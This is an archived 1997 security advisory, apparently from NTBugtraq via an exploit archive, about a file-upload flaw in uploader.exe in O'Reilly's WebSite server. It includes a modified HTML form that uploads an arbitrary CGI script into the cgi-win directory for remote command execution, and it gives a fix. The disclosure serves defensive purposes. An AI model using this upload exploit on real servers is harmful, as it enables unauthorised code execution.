Uploader.exe insecurity
| Description: | pathetic insecurity in uploader.exe that comes with O'reilly's webserver 'website' |
| Author: | Herman de Vette <herman@info.nl> |
| Compromise: | run arbitrary commands on the web server (by placing arbitrary cgi scripts there) |
| Vulnerable Systems: | Those running O'reilly's webserver, website. Mostly Windoze NT and W95 boxes. Some versions of 1.1 and 2.0beta have this vulnerability. |
| Date: | 4 September 1997 |
Date: Thu, 4 Sep 1997 21:38:57 +0200
From: Herman de Vette <herman@info.nl>
To: NTBUGTRAQ@NTADVICE.COM
Subject: [Alert] Website's uploader.exe (from demo) vulnerable
[Alert] Website's uploader.exe (from demo) vulnerable
Check out what I found today (hope it's not an known bug yet)
O'reilly's webserver 'website' contains a demopackage that contains
the cgi-program uploader.exe. The following html-page was included with
it:
----------------------------------------
<HTML><HEAD><TITLE>Upload a File</TITLE></HEAD>
<BODY>
<H1>Upload a file</H1>
<hr>
<h2>NOTE: Your browser must support file uploading.</H2>
<FORM ENCTYPE="multipart/form-data" METHOD=POST
ACTION="/cgi-win/uploader.exe/Uploads/">
<PRE>Your name: <INPUT TYPE=TEXT SIZE=20 NAME="name"> (required)
Email address: <INPUT TYPE=TEXT SIZE=20 NAME="email"> (required)
<b>NOTE:</b> If you don't see a "browse" button below,
your browser
doesn 't support form-based file uploading. Netscape
2.0 and
later have this support.
File to upload: <INPUT TYPE=FILE NAME="upl-file" SIZE=40>
File description: <INPUT TYPE=TEXT SIZE=40 NAME="desc"> (required)
<INPUT TYPE=SUBMIT VALUE="Upload Now"></PRE>
</FORM>
<HR>
<A HREF="mailto:...">
<address>...</address>
</A></BODY></HTML>
-----------------------------------------
The program uploader.exe doesn't check anything at all. If you're lucky
you're running windows NT
and have put only "read/execute access" on cgi-win and other executable
paths. Otherwise (win95) you
have a real problem. You could create a CGI-program, next you change the
HTML-file a little like this:
-----------------------------------------
<HTML><HEAD><TITLE>Upload Any File Anywhere</TITLE></HEAD>
<BODY>
<FORM ENCTYPE="multipart/form-data" METHOD=POST
ACTION="http://host.of.vulnerable.website/cgi-win/uploader.exe/cgi-win/">
<INPUT TYPE=HIDDEN NAME="name" VALUE="Foo">
<INPUT TYPE=HIDDEN NAME="email" VALUE="Foo@bar.com>
File to upload: <INPUT TYPE=FILE NAME="upl-file" SIZE=40><BR>
<INPUT TYPE=TEXT SIZE=40 NAME="desc" VALUE="YouGottaSecurityProblem">
<INPUT TYPE=SUBMIT VALUE="Upload Now">
</FORM>
</BODY></HTML>
------------------------------------------
open the html-file in your browser, select a nice CGI-file to upload
And run that CGI-program remotely. (No need to tell you what this
CGI-program could do,
could be .bat file too in one of website's other cgi-directories)
SOLUTION: remove uploader.exe, delete it, empty your trash bin and use
ftp for file-upload
Herman de Vette
herman@info.nl
The master index of all exploits is available
here (Very large file)
Or you can pick your favorite operating system:
This page is part of Fyodor's exploit
world.
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources:
